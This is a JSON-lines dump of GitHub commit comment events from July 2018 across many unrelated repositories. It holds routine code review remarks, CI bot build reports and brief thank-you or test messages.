{"id":"7970449886","type":"CommitCommentEvent","actor":{"login":"jorrit"},"repo":{"name":"mikeedwards83/Glass.Mapper"},"payload":{"comment":{"id":29719880,"position":5,"line":641,"path":"Source/Glass.Mapper.Sc/GlassHtml.cs","commit_id":"52338bde98e6c9444ad6e3238956cabdbbe58d5e","created_at":"2018-07-16T12:50:04Z","updated_at":"2018-07-16T12:50:04Z","author_association":"NONE","body":"Sitecore 8.1"}},"created_at":"2018-07-16T12:50:04Z"}
{"id":"7970452239","type":"CommitCommentEvent","actor":{"login":"SEGULL"},"repo":{"name":"SEGULL/animacion-01"},"payload":{"comment":{"id":29719888,"position":null,"line":null,"path":null,"commit_id":"d6d72183788ace7c2e86716e6daf4ffca24ee786","created_at":"2018-07-16T12:50:28Z","updated_at":"2018-07-16T12:50:28Z","author_association":"OWNER","body":"hola "}},"created_at":"2018-07-16T12:50:28Z"}
{"id":"7970452900","type":"CommitCommentEvent","actor":{"login":"jorrit"},"repo":{"name":"mikeedwards83/Glass.Mapper"},"payload":{"comment":{"id":29719891,"position":5,"line":641,"path":"Source/Glass.Mapper.Sc/GlassHtml.cs","commit_id":"52338bde98e6c9444ad6e3238956cabdbbe58d5e","created_at":"2018-07-16T12:50:34Z","updated_at":"2018-07-16T12:50:34Z","author_association":"NONE","body":"Should I open an issue?"}},"created_at":"2018-07-16T12:50:34Z"}
{"id":"7970453715","type":"CommitCommentEvent","actor":{"login":"xiecancn"},"repo":{"name":"TjWallas/dynamic-netsec"},"payload":{"comment":{"id":29719895,"position":155,"line":108,"path":"democli/API/container.py","commit_id":"c1a76f267a824250e273f048b03d886b7a1c9d5c","created_at":"2018-07-16T12:50:44Z","updated_at":"2018-07-16T12:50:44Z","author_association":"COLLABORATOR","body":"I used `var_... ` to indicate that the variable is a global variable, \r\ne.g. `var_ssh_identify_file = '/home/vagrant/.ssh/id_mine'` in config.py \r\nI think we can keep it so that it won't be mixed with local variable. @TjWallas "}},"created_at":"2018-07-16T12:50:44Z"}
{"id":"7970456095","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29719900,"position":null,"line":null,"path":null,"commit_id":"b6b47f74f8d615ee280165b3d66abe7f0ff707d1","created_at":"2018-07-16T12:51:10Z","updated_at":"2018-07-16T12:51:10Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2008/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21554 seconds\n\nTests produced 2926 warnings. 2926 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-16T12:51:10Z"}
{"id":"7970458629","type":"CommitCommentEvent","actor":{"login":"jeroenvermeulen"},"repo":{"name":"nbs-system/php-malware-finder"},"payload":{"comment":{"id":29719906,"position":null,"line":null,"path":null,"commit_id":"96ea344f520fa8039dc494836be40ac9be51a7b3","created_at":"2018-07-16T12:51:38Z","updated_at":"2018-07-16T12:51:38Z","author_association":"CONTRIBUTOR","body":"Replaced variable `TEMPDIR` by `GENTEMPDIR` because chances are `TEMPDIR` is already in use in the environment of the user."}},"created_at":"2018-07-16T12:51:38Z"}
{"id":"7970460869","type":"CommitCommentEvent","actor":{"login":"vousys"},"repo":{"name":"framework7io/framework7"},"payload":{"comment":{"id":29719911,"position":null,"line":null,"path":null,"commit_id":"2e351a844273fe107b7d42602d5a5e1d91da1847","created_at":"2018-07-16T12:52:03Z","updated_at":"2018-07-16T12:52:03Z","author_association":"NONE","body":"Thanks!!"}},"created_at":"2018-07-16T12:52:03Z"}
{"id":"7970462400","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29719912,"position":12,"line":55,"path":"mscore/startcenter.cpp","commit_id":"8d45e4637807a5829a33cbc6804ccafda2f82ed2","created_at":"2018-07-16T12:52:19Z","updated_at":"2018-07-16T12:52:19Z","author_association":"CONTRIBUTOR","body":"Better not indent preprocessor stuff "}},"created_at":"2018-07-16T12:52:19Z"}
{"id":"7970464497","type":"CommitCommentEvent","actor":{"login":"Gregye"},"repo":{"name":"Gregye/s3_gittest"},"payload":{"comment":{"id":29719915,"position":null,"line":null,"path":null,"commit_id":"9692054d49c63f32b324acaecfeeef6255ff71c6","created_at":"2018-07-16T12:52:40Z","updated_at":"2018-07-16T12:52:40Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-16T12:52:40Z"}
{"id":"7970468648","type":"CommitCommentEvent","actor":{"login":"gashcrumb"},"repo":{"name":"phantomjinx/syndesis"},"payload":{"comment":{"id":29719921,"position":null,"line":null,"path":null,"commit_id":"09040815d01ced2946f88000d5d5249e610fa740","created_at":"2018-07-16T12:53:27Z","updated_at":"2018-07-16T12:53:27Z","author_association":"NONE","body":"This second URL needs to point to the openshift console host:port, so while this substitution will work this will break the links from syndesis to the openshift console in development.\r\n\r\nI guess though the original solution relies on minishift which is a no-go if you've a proper cluster..."}},"created_at":"2018-07-16T12:53:27Z"}
{"id":"7970470761","type":"CommitCommentEvent","actor":{"login":"rwhitley45"},"repo":{"name":"rwhitley45/waldo--rwhitley45-"},"payload":{"comment":{"id":29719925,"position":null,"line":null,"path":null,"commit_id":"4a16ae856e1c933661a0692ccf0243daa626448d","created_at":"2018-07-16T12:53:50Z","updated_at":"2018-07-16T12:53:50Z","author_association":"OWNER","body":"OpenCVs shape returns a tuple(y,x) as opposed to (x,y).  Returning the opposite will give the classic (x,y) coordinate return. "}},"created_at":"2018-07-16T12:53:50Z"}
{"id":"7970475811","type":"CommitCommentEvent","actor":{"login":"nupur-batra"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29719928,"position":1,"line":1,"path":"tests/Fixture/FormDetailsFixture.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T12:54:44Z","updated_at":"2018-07-16T12:54:44Z","author_association":"OWNER","body":"No sir."}},"created_at":"2018-07-16T12:54:44Z"}
{"id":"7970476228","type":"CommitCommentEvent","actor":{"login":"penfold42"},"repo":{"name":"pi1541/Pi1541"},"payload":{"comment":{"id":29719930,"position":null,"line":null,"path":null,"commit_id":"30f1d4747ef89ebfde65ebf0b0fc52249c7443f7","created_at":"2018-07-16T12:54:49Z","updated_at":"2018-07-16T12:54:49Z","author_association":"CONTRIBUTOR","body":"Sorry... my bad"}},"created_at":"2018-07-16T12:54:49Z"}
{"id":"7970480449","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29719935,"position":null,"line":null,"path":null,"commit_id":"3b3aa887aeb3742cfcc5fdd670f641fc71a1dbda","created_at":"2018-07-16T12:55:34Z","updated_at":"2018-07-16T12:55:34Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-282](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-282).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-282-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-16T12:55:34Z"}
{"id":"7970481182","type":"CommitCommentEvent","actor":{"login":"gashcrumb"},"repo":{"name":"phantomjinx/syndesis"},"payload":{"comment":{"id":29719937,"position":5,"line":16,"path":"app/ui/package.json","commit_id":"09040815d01ced2946f88000d5d5249e610fa740","created_at":"2018-07-16T12:55:42Z","updated_at":"2018-07-16T12:55:42Z","author_association":"NONE","body":"Might also be worth applying this change to the `minishift-aot` target, this is sometimes used to debug problems that only show up with an AOT build."}},"created_at":"2018-07-16T12:55:42Z"}
{"id":"7970481407","type":"CommitCommentEvent","actor":{"login":"Soulofdestiny"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29719938,"position":null,"line":null,"path":null,"commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T12:55:44Z","updated_at":"2018-07-16T12:55:44Z","author_association":"OWNER","body":"> What happen if one test case failed?\r\nThat's the plan yes - loading groups of tests (e.g. all kernel tests) on top of one installation\r\nbut treat them independently. therefore I removed the \"fatal\" flag in your proposal. (not tested yet though)\r\nThe alternative would be to have a dedicated installation and have a testsuite which only executes one module... unfortunately we don't have the possibility to load an existing image on zVM, which means that always a full installation would need to be performed before every tests - that's why I vote for option 1\r\n\r\n> What happen if a test case requires a reboot of a z/VM guest, would it work?\r\n> If that will work, have you an example for us?\r\n\r\nreboot is working, yes - check the `power_action` function here: https://github.com/os-autoinst/os-autoinst-distri-opensuse/blob/2ea7df80c35a6eca86be19a66f090a69948476f7/lib/utils.pm#L756\r\n\r\nand an example where it's used:\r\nhttps://github.com/os-autoinst/os-autoinst-distri-opensuse/blob/8f7b51204d9a3f04031bd70c055b698d73f88d5a/tests/x11/reboot_gnome.pm#L22"}},"created_at":"2018-07-16T12:55:44Z"}
{"id":"7970482244","type":"CommitCommentEvent","actor":{"login":"jasonrobson"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29719941,"position":10,"line":7,"path":"src/Orders.js","commit_id":"53de9d12d20149932b3bfd024ae9dca81e527d9f","created_at":"2018-07-16T12:55:53Z","updated_at":"2018-07-16T12:55:53Z","author_association":"OWNER","body":"devo, remover o table completamente do Orders e adicionar ao todolist para separar os elementos em si, ou devo fazer uma table para tanto o orders como o todolist?"}},"created_at":"2018-07-16T12:55:53Z"}
{"id":"7970482691","type":"CommitCommentEvent","actor":{"login":"ArtisticMenase"},"repo":{"name":"thefapinstructor/fapinstructor"},"payload":{"comment":{"id":29719943,"position":13,"line":32,"path":"src/game/utils/fetchPictures.js","commit_id":"56bf832b32c2584388550a4444929603d4ff39d6","created_at":"2018-07-16T12:55:58Z","updated_at":"2018-07-16T12:55:58Z","author_association":"CONTRIBUTOR","body":"map should be replaced with a forEach"}},"created_at":"2018-07-16T12:55:58Z"}
{"id":"7970483918","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl-docs"},"payload":{"comment":{"id":29719947,"position":75,"line":81,"path":"buildSrc/src/main/kotlin/api/GradlePluginsAccessors.kt","commit_id":"8b490c40821e4fd83d2c383ea18ae9101f9d1e53","created_at":"2018-07-16T12:56:13Z","updated_at":"2018-07-16T12:56:13Z","author_association":"MEMBER","body":"What's the point of `toList()` here?"}},"created_at":"2018-07-16T12:56:13Z"}
{"id":"7970485902","type":"CommitCommentEvent","actor":{"login":"galegosimpatico"},"repo":{"name":"anura-engine/anura"},"payload":{"comment":{"id":29719954,"position":null,"line":null,"path":null,"commit_id":"cf41a1061bca2c6f3a54d5b55fce42527771a720","created_at":"2018-07-16T12:56:34Z","updated_at":"2018-07-16T12:56:34Z","author_association":"COLLABORATOR","body":"Should've applied strong typing..."}},"created_at":"2018-07-16T12:56:34Z"}
{"id":"7970487955","type":"CommitCommentEvent","actor":{"login":"mcepeda"},"repo":{"name":"cerminar/cmssw"},"payload":{"comment":{"id":29719958,"position":null,"line":null,"path":null,"commit_id":"7a9e16c035e66a43a32980031ef8165542164940","created_at":"2018-07-16T12:56:58Z","updated_at":"2018-07-16T12:56:58Z","author_association":"NONE","body":"EG HGC as in this version are already inside the last batch of ntuples.\n\nI was going to redo them today / tomorrow with a minor modification for the muons - if you want me to wait a couple of days to give you the chance to incorporate more changes on your end let me know. \n\nMaría \n\nSent from my iPhone\n\n> On 16 Jul 2018, at 14:42, cerminar <notifications@github.com> wrote:\n> \n> Hello @rekovic,\n> indeed I addressed this problem with the data formats in some branch and Jean-Baptiste is about to propagate this to all the relevant places.\n> I have been offline in the last two weeks and I am catching up. Among other things, the evaluation of the performance of these ID criteria is very high in my priority list....I wrote the egamma lines without any chance to actually test them. Of course if we can get these objects in the L1 ntuples it would be easier for everybody.\n> \n> Cheers,\n> G\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-16T12:56:58Z"}
{"id":"7970491632","type":"CommitCommentEvent","actor":{"login":"tosiara"},"repo":{"name":"Motion-Project/motion"},"payload":{"comment":{"id":29719971,"position":21,"line":308,"path":"video_common.c","commit_id":"eb4f83b1bf2628278c03e5118174a13f6a74524b","created_at":"2018-07-16T12:57:40Z","updated_at":"2018-07-16T12:57:40Z","author_association":"MEMBER","body":"@notorca (who has previously implemented NEON optimizations for motion) has pointed out that there may be a missing last line of the U and V planes as this loop skips the last line. @Mr-DaveDev can you please confirm?"}},"created_at":"2018-07-16T12:57:40Z"}
{"id":"7970495838","type":"CommitCommentEvent","actor":{"login":"dsq19920609"},"repo":{"name":"dsq19920609/dong"},"payload":{"comment":{"id":29719978,"position":null,"line":null,"path":null,"commit_id":"573113f6add66680b2ea766a09e0f66068954aa7","created_at":"2018-07-16T12:58:28Z","updated_at":"2018-07-16T12:58:28Z","author_association":"OWNER","body":"**这是加粗的文字**\r\n*这是倾斜的文字*`\r\n***这是斜体加粗的文字***\r\n~~这是加删除线的文字~~"}},"created_at":"2018-07-16T12:58:28Z"}
{"id":"7970495985","type":"CommitCommentEvent","actor":{"login":"YorikSar"},"repo":{"name":"bendlas/nixpkgs"},"payload":{"comment":{"id":29719979,"position":null,"line":null,"path":null,"commit_id":"b67366f888f988511fd77657839e440a2ea0237f","created_at":"2018-07-16T12:58:30Z","updated_at":"2018-07-16T12:58:30Z","author_association":"NONE","body":"@bendlas Too late: https://github.com/NixOS/nixpkgs/pull/43539 :)"}},"created_at":"2018-07-16T12:58:30Z"}
{"id":"7970497508","type":"CommitCommentEvent","actor":{"login":"dsq19920609"},"repo":{"name":"dsq19920609/dong"},"payload":{"comment":{"id":29719980,"position":null,"line":null,"path":null,"commit_id":"573113f6add66680b2ea766a09e0f66068954aa7","created_at":"2018-07-16T12:58:46Z","updated_at":"2018-07-16T12:58:46Z","author_association":"OWNER","body":">这是引用的内容\r\n>>这是引用的内容\r\n>>>>>>>>>>这是引用的内容"}},"created_at":"2018-07-16T12:58:46Z"}
{"id":"7970500550","type":"CommitCommentEvent","actor":{"login":"Julusian"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29719986,"position":null,"line":null,"path":null,"commit_id":"1499d11d90ac8ad3a437bc2ae1746f84e6e33bc9","created_at":"2018-07-16T12:59:21Z","updated_at":"2018-07-16T12:59:21Z","author_association":"COLLABORATOR","body":"Thanks @dotarmin, I have raised a PR to fix #1041\r\nI only compiled and tested this on linux as my laptop is unable to run casparcg on windows since the change to opengl 4.5"}},"created_at":"2018-07-16T12:59:21Z"}
{"id":"7970510493","type":"CommitCommentEvent","actor":{"login":"kevbabs"},"repo":{"name":"kevbabs/BabsonCsharpProject"},"payload":{"comment":{"id":29720007,"position":null,"line":null,"path":null,"commit_id":"6db543af1e04b6153c41ac67e121a661dc4237de","created_at":"2018-07-16T13:01:07Z","updated_at":"2018-07-16T13:01:07Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-16T13:01:07Z"}
{"id":"7970514406","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29720017,"position":10,"line":7,"path":"src/Orders.js","commit_id":"53de9d12d20149932b3bfd024ae9dca81e527d9f","created_at":"2018-07-16T13:01:49Z","updated_at":"2018-07-16T13:01:49Z","author_association":"COLLABORATOR","body":"Pode unir os dois inicialmente. O `span` do `Order` na verdade deveria ser um componente dentro do `thead` da tabela. É o cabeçalho da tabela de `TodoList`."}},"created_at":"2018-07-16T13:01:49Z"}
{"id":"7970515921","type":"CommitCommentEvent","actor":{"login":"bendlas"},"repo":{"name":"bendlas/nixpkgs"},"payload":{"comment":{"id":29720022,"position":null,"line":null,"path":null,"commit_id":"b67366f888f988511fd77657839e440a2ea0237f","created_at":"2018-07-16T13:02:06Z","updated_at":"2018-07-16T13:02:06Z","author_association":"OWNER","body":"Yep, I noticed, when rebasing :-)\r\nThanks!"}},"created_at":"2018-07-16T13:02:06Z"}
{"id":"7970516429","type":"CommitCommentEvent","actor":{"login":"tahir084"},"repo":{"name":"damienbod/AspNetCoreLocalization"},"payload":{"comment":{"id":29720024,"position":1,"line":1,"path":"AspNet5Localization/global.json","commit_id":"3ee756ef4e5c3b587431f375a97b1fe568076820","created_at":"2018-07-16T13:02:12Z","updated_at":"2018-07-16T13:02:12Z","author_association":"NONE","body":"[NadeemCV_2.pdf](https://github.com/damienbod/AspNetCoreLocalization/files/2197671/NadeemCV_2.pdf)\r\n"}},"created_at":"2018-07-16T13:02:12Z"}
{"id":"7970516430","type":"CommitCommentEvent","actor":{"login":"ch11y"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29720023,"position":null,"line":null,"path":null,"commit_id":"03ab64c3a68f3b990bf690ede06e3066ad4e35a0","created_at":"2018-07-16T13:02:12Z","updated_at":"2018-07-16T13:02:12Z","author_association":"NONE","body":"I still cannot compile even I copied that file. I am surprised that people can push some code that does not compile."}},"created_at":"2018-07-16T13:02:12Z"}
{"id":"7970520380","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/kotlin-dsl-docs"},"payload":{"comment":{"id":29720033,"position":75,"line":81,"path":"buildSrc/src/main/kotlin/api/GradlePluginsAccessors.kt","commit_id":"8b490c40821e4fd83d2c383ea18ae9101f9d1e53","created_at":"2018-07-16T13:02:54Z","updated_at":"2018-07-16T13:02:54Z","author_association":"MEMBER","body":"`jar.entries()` returns an `Enumeration<T>`\r\n\r\nRefined by using `asSequence()` instead in https://github.com/gradle/kotlin-dsl-docs/commit/f8ada733747c63632d652933af1812bc8221325e"}},"created_at":"2018-07-16T13:02:54Z"}
{"id":"7970528270","type":"CommitCommentEvent","actor":{"login":"N-Dekker"},"repo":{"name":"SuperElastix/SuperElastix"},"payload":{"comment":{"id":29720055,"position":null,"line":null,"path":null,"commit_id":"1eaf68f950f84409cd73b8f1766d5688e12ed8e6","created_at":"2018-07-16T13:04:17Z","updated_at":"2018-07-16T13:04:17Z","author_association":"MEMBER","body":"@stefanklein This commit appears to build fine now at https://travis-ci.org/SuperElastix/SuperElastix/builds/404421012 adding a pure virtual ComponentBase::GetComponentName(). But didn't you encounter some error when you uncommented this line of code?"}},"created_at":"2018-07-16T13:04:17Z"}
{"id":"7970535752","type":"CommitCommentEvent","actor":{"login":"bbashy"},"repo":{"name":"laradock/laradock"},"payload":{"comment":{"id":29720070,"position":null,"line":null,"path":null,"commit_id":"4ce25e95b48b2a9e51f569c597689597d54506d6","created_at":"2018-07-16T13:05:39Z","updated_at":"2018-07-16T13:05:39Z","author_association":"NONE","body":"Thank you for this :+1:"}},"created_at":"2018-07-16T13:05:39Z"}
{"id":"7970537140","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29720073,"position":null,"line":null,"path":null,"commit_id":"bd9f9423eacd50014755ec06b47bde6135aefcbc","created_at":"2018-07-16T13:05:55Z","updated_at":"2018-07-16T13:05:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [022 - Adicionar Uso de Cache no travis CI](https://trello.com/c/GHNXHfQD/34-022-adicionar-uso-de-cache-no-travis-ci)"}},"created_at":"2018-07-16T13:05:55Z"}
{"id":"7970543297","type":"CommitCommentEvent","actor":{"login":"phantomjinx"},"repo":{"name":"phantomjinx/syndesis"},"payload":{"comment":{"id":29720089,"position":5,"line":16,"path":"app/ui/package.json","commit_id":"09040815d01ced2946f88000d5d5249e610fa740","created_at":"2018-07-16T13:07:06Z","updated_at":"2018-07-16T13:07:06Z","author_association":"OWNER","body":"So bear in mind this was an experiment to get things up and running on my specific setup. It solves the issues I ran into, allowing CORS and webpacks for debugging. Exactly what the correct place to add this is really the question as I don't think it needs to apply to a standard minishift configuration. Maybe, start:oc-cluster instead? Only if it doesn't upset the minishift setup should it be merged in this form. WDYT?"}},"created_at":"2018-07-16T13:07:06Z"}
{"id":"7970554619","type":"CommitCommentEvent","actor":{"login":"Bolth"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29720124,"position":2,"line":2,"path":".gitignore","commit_id":"117a329698e5624bc4c470ccc5d9fdaae9e44f96","created_at":"2018-07-16T13:09:12Z","updated_at":"2018-07-16T13:09:12Z","author_association":"NONE","body":"##123av #¥"}},"created_at":"2018-07-16T13:09:12Z"}
{"id":"7970555057","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29720127,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T13:09:16Z","updated_at":"2018-07-16T13:09:16Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-16T13:09:16Z"}
{"id":"7970555648","type":"CommitCommentEvent","actor":{"login":"cerminar"},"repo":{"name":"cerminar/cmssw"},"payload":{"comment":{"id":29720130,"position":null,"line":null,"path":null,"commit_id":"7a9e16c035e66a43a32980031ef8165542164940","created_at":"2018-07-16T13:09:23Z","updated_at":"2018-07-16T13:09:23Z","author_association":"OWNER","body":"@mcepeda: great. You can go ahead. Could you give me a pointer to the final location of the ntuples?\r\nthanks,\r\nG"}},"created_at":"2018-07-16T13:09:23Z"}
{"id":"7970556540","type":"CommitCommentEvent","actor":{"login":"phantomjinx"},"repo":{"name":"phantomjinx/syndesis"},"payload":{"comment":{"id":29720133,"position":null,"line":null,"path":null,"commit_id":"09040815d01ced2946f88000d5d5249e610fa740","created_at":"2018-07-16T13:09:32Z","updated_at":"2018-07-16T13:09:32Z","author_association":"OWNER","body":"So have been looking at a means of getting back the OS host using oc but cannot find a way at the moment. Something neutral will be required like that in order to allow both a minishift and oc-cluster env. Unless of course, this becomes a separate file then something else could be used. Not sure what at the moment as the ${OSHOST} is the route host to syndesis and not the console/OS hostname."}},"created_at":"2018-07-16T13:09:32Z"}
{"id":"7970557559","type":"CommitCommentEvent","actor":{"login":"sgrif"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29720136,"position":74,"line":74,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-16T13:09:42Z","updated_at":"2018-07-16T13:09:42Z","author_association":"OWNER","body":"`job_id` will be `None` if there are no jobs to perform. It only grabs failed jobs because the first thing we do in this transaction is delete the job row."}},"created_at":"2018-07-16T13:09:42Z"}
{"id":"7970564102","type":"CommitCommentEvent","actor":{"login":"pi1541"},"repo":{"name":"pi1541/Pi1541"},"payload":{"comment":{"id":29720158,"position":null,"line":null,"path":null,"commit_id":"30f1d4747ef89ebfde65ebf0b0fc52249c7443f7","created_at":"2018-07-16T13:10:54Z","updated_at":"2018-07-16T13:10:54Z","author_association":"OWNER","body":"It all good. I should have tested it better."}},"created_at":"2018-07-16T13:10:54Z"}
{"id":"7970564129","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29720159,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T13:10:55Z","updated_at":"2018-07-16T13:10:55Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T13:10:55Z"}
{"id":"7970564846","type":"CommitCommentEvent","actor":{"login":"pcsanwald"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":29720161,"position":17,"line":103,"path":"server/src/test/java/org/elasticsearch/client/documentation/IndicesDocumentationIT.java","commit_id":"a2a7f0c22949f32e82213796082dd57903d461a6","created_at":"2018-07-16T13:11:03Z","updated_at":"2018-07-16T13:11:03Z","author_association":"CONTRIBUTOR","body":"LGTM! "}},"created_at":"2018-07-16T13:11:03Z"}
{"id":"7970570149","type":"CommitCommentEvent","actor":{"login":"handrok"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29720176,"position":12,"line":55,"path":"mscore/startcenter.cpp","commit_id":"8d45e4637807a5829a33cbc6804ccafda2f82ed2","created_at":"2018-07-16T13:12:01Z","updated_at":"2018-07-16T13:12:01Z","author_association":"CONTRIBUTOR","body":"Fixed"}},"created_at":"2018-07-16T13:12:01Z"}
{"id":"7970574525","type":"CommitCommentEvent","actor":{"login":"taq"},"repo":{"name":"w0rp/ale"},"payload":{"comment":{"id":29720184,"position":null,"line":null,"path":null,"commit_id":"fcd62342d531bdeacbd41a8dfa6163301f1fdf9b","created_at":"2018-07-16T13:12:44Z","updated_at":"2018-07-16T13:12:44Z","author_association":"NONE","body":"Hey @w0rp ! Seems that with these last changes we don't need to insert that code anymore on `.vimrc`."}},"created_at":"2018-07-16T13:12:44Z"}
{"id":"7970576473","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl-docs"},"payload":{"comment":{"id":29720186,"position":null,"line":null,"path":null,"commit_id":"f8ada733747c63632d652933af1812bc8221325e","created_at":"2018-07-16T13:13:04Z","updated_at":"2018-07-16T13:13:04Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-16T13:13:04Z"}
{"id":"7970580949","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/kotlin-dsl-docs"},"payload":{"comment":{"id":29720199,"position":75,"line":81,"path":"buildSrc/src/main/kotlin/api/GradlePluginsAccessors.kt","commit_id":"8b490c40821e4fd83d2c383ea18ae9101f9d1e53","created_at":"2018-07-16T13:13:51Z","updated_at":"2018-07-16T13:13:51Z","author_association":"MEMBER","body":"Thanks for the explanation. 👍 to `asSequence()`."}},"created_at":"2018-07-16T13:13:51Z"}
{"id":"7970581911","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29720204,"position":null,"line":null,"path":null,"commit_id":"77cfc809eb107e1b24a3991eb0368f4d353bea5e","created_at":"2018-07-16T13:14:02Z","updated_at":"2018-07-16T13:14:02Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T13:14:02Z"}
{"id":"7970589574","type":"CommitCommentEvent","actor":{"login":"w0rp"},"repo":{"name":"w0rp/ale"},"payload":{"comment":{"id":29720225,"position":null,"line":null,"path":null,"commit_id":"fcd62342d531bdeacbd41a8dfa6163301f1fdf9b","created_at":"2018-07-16T13:15:25Z","updated_at":"2018-07-16T13:15:25Z","author_association":"OWNER","body":"Cool, sounds good. This should all work, then."}},"created_at":"2018-07-16T13:15:25Z"}
{"id":"7970592552","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29720232,"position":null,"line":null,"path":null,"commit_id":"4058a960e499bb02b4c01f0eca68cbeb12a50c5b","created_at":"2018-07-16T13:15:55Z","updated_at":"2018-07-16T13:15:55Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-46](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-46-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-16T13:15:55Z"}
{"id":"7970597950","type":"CommitCommentEvent","actor":{"login":"qwertbob"},"repo":{"name":"qwertbob/P64xDataModel"},"payload":{"comment":{"id":29720242,"position":null,"line":null,"path":null,"commit_id":"fdbc0348681bd908d9eec96dd2fc3d331f9b76eb","created_at":"2018-07-16T13:16:53Z","updated_at":"2018-07-16T13:16:53Z","author_association":"OWNER","body":"P642 data source is fully completed\r\nAll data source completed"}},"created_at":"2018-07-16T13:16:53Z"}
